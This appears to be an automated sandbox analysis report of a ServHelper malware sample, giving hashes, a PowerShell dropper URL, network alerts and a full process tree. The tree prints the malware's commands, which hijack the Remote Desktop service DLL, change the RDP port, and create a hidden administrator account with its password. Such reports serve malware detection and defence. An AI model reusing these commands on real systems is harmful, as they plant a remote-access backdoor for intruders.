da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605

Analysis

max time kernel
113s
max time network
124s
platform
windows10_x64
resource
win10-en-20210920
submitted
22-09-2021 06:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61d5e32562d1c70daf0a3112f7888258.exe
Size

5.7MB
MD5

61d5e32562d1c70daf0a3112f7888258
SHA1

11c54ce99e87637f58c7bc0bd8134c73df9bf879
SHA256

da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
SHA512

9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2

Score

10^/10

persistence suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
8	1308	powershell.exe
10	1308	powershell.exe
11	1308	powershell.exe
12	1308	powershell.exe
14	1308	powershell.exe
16	1308	powershell.exe
18	1308	powershell.exe
20	1308	powershell.exe
22	1308	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000800000001abae-350.dat	upx
behavioral2/files/0x000a00000001abb0-351.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
1412	Process not Found
1412	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tl1c2fkk.jw4.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E23.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F01.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E82.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3EA2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F12.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ho2h1bbl.ym0.ps1	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1504	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
1180	powershell.exe
1180	powershell.exe
1180	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
1308	powershell.exe
1308	powershell.exe
1308	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
620	Process not Found
620	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeIncreaseQuotaPrivilege	804	powershell.exe
Token: SeSecurityPrivilege	804	powershell.exe
Token: SeTakeOwnershipPrivilege	804	powershell.exe
Token: SeLoadDriverPrivilege	804	powershell.exe
Token: SeSystemProfilePrivilege	804	powershell.exe
Token: SeSystemtimePrivilege	804	powershell.exe
Token: SeProfSingleProcessPrivilege	804	powershell.exe
Token: SeIncBasePriorityPrivilege	804	powershell.exe
Token: SeCreatePagefilePrivilege	804	powershell.exe
Token: SeBackupPrivilege	804	powershell.exe
Token: SeRestorePrivilege	804	powershell.exe
Token: SeShutdownPrivilege	804	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeSystemEnvironmentPrivilege	804	powershell.exe
Token: SeRemoteShutdownPrivilege	804	powershell.exe
Token: SeUndockPrivilege	804	powershell.exe
Token: SeManageVolumePrivilege	804	powershell.exe
Token: 33	804	powershell.exe
Token: 34	804	powershell.exe
Token: 35	804	powershell.exe
Token: 36	804	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1180	powershell.exe
Token: SeSecurityPrivilege	1180	powershell.exe
Token: SeTakeOwnershipPrivilege	1180	powershell.exe
Token: SeLoadDriverPrivilege	1180	powershell.exe
Token: SeSystemProfilePrivilege	1180	powershell.exe
Token: SeSystemtimePrivilege	1180	powershell.exe
Token: SeProfSingleProcessPrivilege	1180	powershell.exe
Token: SeIncBasePriorityPrivilege	1180	powershell.exe
Token: SeCreatePagefilePrivilege	1180	powershell.exe
Token: SeBackupPrivilege	1180	powershell.exe
Token: SeRestorePrivilege	1180	powershell.exe
Token: SeShutdownPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeSystemEnvironmentPrivilege	1180	powershell.exe
Token: SeRemoteShutdownPrivilege	1180	powershell.exe
Token: SeUndockPrivilege	1180	powershell.exe
Token: SeManageVolumePrivilege	1180	powershell.exe
Token: 33	1180	powershell.exe
Token: 34	1180	powershell.exe
Token: 35	1180	powershell.exe
Token: 36	1180	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeIncreaseQuotaPrivilege	2568	powershell.exe
Token: SeSecurityPrivilege	2568	powershell.exe
Token: SeTakeOwnershipPrivilege	2568	powershell.exe
Token: SeLoadDriverPrivilege	2568	powershell.exe
Token: SeSystemProfilePrivilege	2568	powershell.exe
Token: SeSystemtimePrivilege	2568	powershell.exe
Token: SeProfSingleProcessPrivilege	2568	powershell.exe
Token: SeIncBasePriorityPrivilege	2568	powershell.exe
Token: SeCreatePagefilePrivilege	2568	powershell.exe
Token: SeBackupPrivilege	2568	powershell.exe
Token: SeRestorePrivilege	2568	powershell.exe
Token: SeShutdownPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeSystemEnvironmentPrivilege	2568	powershell.exe
Token: SeRemoteShutdownPrivilege	2568	powershell.exe
Token: SeUndockPrivilege	2568	powershell.exe
Token: SeManageVolumePrivilege	2568	powershell.exe
Token: 33	2568	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 3584	2652	61d5e32562d1c70daf0a3112f7888258.exe	71
PID 2652 wrote to memory of 3584	2652	61d5e32562d1c70daf0a3112f7888258.exe	71
PID 3584 wrote to memory of 1076	3584	powershell.exe	73
PID 3584 wrote to memory of 1076	3584	powershell.exe	73
PID 1076 wrote to memory of 1412	1076	csc.exe	74
PID 1076 wrote to memory of 1412	1076	csc.exe	74
PID 3584 wrote to memory of 804	3584	powershell.exe	75
PID 3584 wrote to memory of 804	3584	powershell.exe	75
PID 3584 wrote to memory of 1180	3584	powershell.exe	78
PID 3584 wrote to memory of 1180	3584	powershell.exe	78
PID 3584 wrote to memory of 2568	3584	powershell.exe	80
PID 3584 wrote to memory of 2568	3584	powershell.exe	80
PID 3584 wrote to memory of 1636	3584	powershell.exe	82
PID 3584 wrote to memory of 1636	3584	powershell.exe	82
PID 3584 wrote to memory of 1504	3584	powershell.exe	83
PID 3584 wrote to memory of 1504	3584	powershell.exe	83
PID 3584 wrote to memory of 1816	3584	powershell.exe	84
PID 3584 wrote to memory of 1816	3584	powershell.exe	84
PID 3584 wrote to memory of 1180	3584	powershell.exe	85
PID 3584 wrote to memory of 1180	3584	powershell.exe	85
PID 1180 wrote to memory of 1848	1180	net.exe	86
PID 1180 wrote to memory of 1848	1180	net.exe	86
PID 3584 wrote to memory of 2784	3584	powershell.exe	87
PID 3584 wrote to memory of 2784	3584	powershell.exe	87
PID 2784 wrote to memory of 1192	2784	cmd.exe	88
PID 2784 wrote to memory of 1192	2784	cmd.exe	88
PID 1192 wrote to memory of 4088	1192	cmd.exe	89
PID 1192 wrote to memory of 4088	1192	cmd.exe	89
PID 4088 wrote to memory of 3104	4088	net.exe	90
PID 4088 wrote to memory of 3104	4088	net.exe	90
PID 3584 wrote to memory of 2800	3584	powershell.exe	91
PID 3584 wrote to memory of 2800	3584	powershell.exe	91
PID 2800 wrote to memory of 1096	2800	cmd.exe	92
PID 2800 wrote to memory of 1096	2800	cmd.exe	92
PID 1096 wrote to memory of 2604	1096	cmd.exe	93
PID 1096 wrote to memory of 2604	1096	cmd.exe	93
PID 2604 wrote to memory of 984	2604	net.exe	94
PID 2604 wrote to memory of 984	2604	net.exe	94
PID 896 wrote to memory of 1880	896	cmd.exe	98
PID 896 wrote to memory of 1880	896	cmd.exe	98
PID 1880 wrote to memory of 1740	1880	net.exe	99
PID 1880 wrote to memory of 1740	1880	net.exe	99
PID 3244 wrote to memory of 3848	3244	cmd.exe	102
PID 3244 wrote to memory of 3848	3244	cmd.exe	102
PID 3848 wrote to memory of 352	3848	net.exe	103
PID 3848 wrote to memory of 352	3848	net.exe	103
PID 1272 wrote to memory of 852	1272	cmd.exe	106
PID 1272 wrote to memory of 852	1272	cmd.exe	106
PID 852 wrote to memory of 1816	852	net.exe	107
PID 852 wrote to memory of 1816	852	net.exe	107
PID 3980 wrote to memory of 1308	3980	cmd.exe	111
PID 3980 wrote to memory of 1308	3980	cmd.exe	111
PID 1308 wrote to memory of 1432	1308	net.exe	110
PID 1308 wrote to memory of 1432	1308	net.exe	110
PID 3704 wrote to memory of 3332	3704	cmd.exe	114
PID 3704 wrote to memory of 3332	3704	cmd.exe	114
PID 3332 wrote to memory of 3752	3332	net.exe	115
PID 3332 wrote to memory of 3752	3332	net.exe	115
PID 2256 wrote to memory of 1756	2256	cmd.exe	118
PID 2256 wrote to memory of 1756	2256	cmd.exe	118
PID 1756 wrote to memory of 1736	1756	net.exe	119
PID 1756 wrote to memory of 1736	1756	net.exe	119
PID 2352 wrote to memory of 1568	2352	cmd.exe	122
PID 2352 wrote to memory of 1568	2352	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe
"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp" "c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP"
      4⤵
      PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1636
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1504
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1816
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1192
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1096
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2604
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1728
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3848

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1740

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc w6OkGKLL /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3244
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc w6OkGKLL /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL /add
    3⤵
    PID:352

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1816

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
PID:1432

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3704
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3752

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc w6OkGKLL
1⤵
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc w6OkGKLL
  2⤵
